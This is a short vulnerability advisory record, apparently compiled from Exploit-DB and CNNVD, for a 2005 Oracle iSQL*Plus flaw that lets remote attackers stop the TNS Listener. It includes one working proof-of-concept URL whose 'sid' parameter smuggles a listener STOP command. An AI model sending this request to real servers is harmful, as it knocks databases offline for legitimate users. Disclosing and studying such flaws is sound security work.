https://www.exploit-db.com/exploits/26331
https://cxsecurity.com/issue/WLB-2005100024
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200510-096

Oracle是一款大型的商业数据库系统。OracleiSQL*PLUS中的漏洞允许远程攻击者通过发布特殊的HTTP请求终止TNSListener服务，拒绝合法用户的进一步数据库服务。

source: http://www.securityfocus.com/bid/15032/info

Oracle iSQL*PLUS is susceptible to a vulnerability that allows remote attackers to stop the TNS Listener service, denying further database service to legitimate users.

By issuing a specific HTTP request, remote attackers may cause the affected application to stop the TNS Listener.

This issue was reported in Oracle Database version 9.0.2.4; other versions may also be affected.

These issues was originally described and addressed in Oracle Critical Patch Update - July 2005, BID 14238 (Oracle July Security Update Multiple Vulnerabilities). Due to the availability of more information, these issues are being assigned a separate BID. 

http://www.example.com:3339/isqlplus?username=s&password=s&sid=%28DESCRIPTION%3D%28ADDRESS_LIST%3D%28ADDRESS%3D%28PROTOCOL%3DTCP%29%28HOST%3Dlocalhost%29%28PORT%3D1521%29%29%29%28CONNECT_DATA%3D%28COMMAND%3DSTOP%29%28SERVICE%3DLISTENER%29%28USER%3DHacker%29%29%29&login=Login&action=logon

来源:MISC
链接:http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html
来源:SECUNIA
名称:15991
链接:http://secunia.com/advisories/15991/
来源:XF
名称:oracle-isql-tns-dos(22544)
链接:http://xforce.iss.net/xforce/xfdb/22544
来源:BID
名称:15032
链接:http://www.securityfocus.com/bid/15032
来源:MISC
链接:http://www.red-database-security.com/advisory/oracle_isqlplus_shutdown.html
来源:BUGTRAQ
名称:20051007ShutdownTNSListenerviaOracleiSQL*Plus
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112870589127719&w;=2
来源:FULLDISC
名称:20051007ShutdownTNSListenerviaOracleiSQL*Plus
链接:http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0176.html
来源:OSVDB
名称:20056
链接:http://www.osvdb.org/20056
来源:SREASON
名称:64
链接:http://securityreason.com/securityalert/64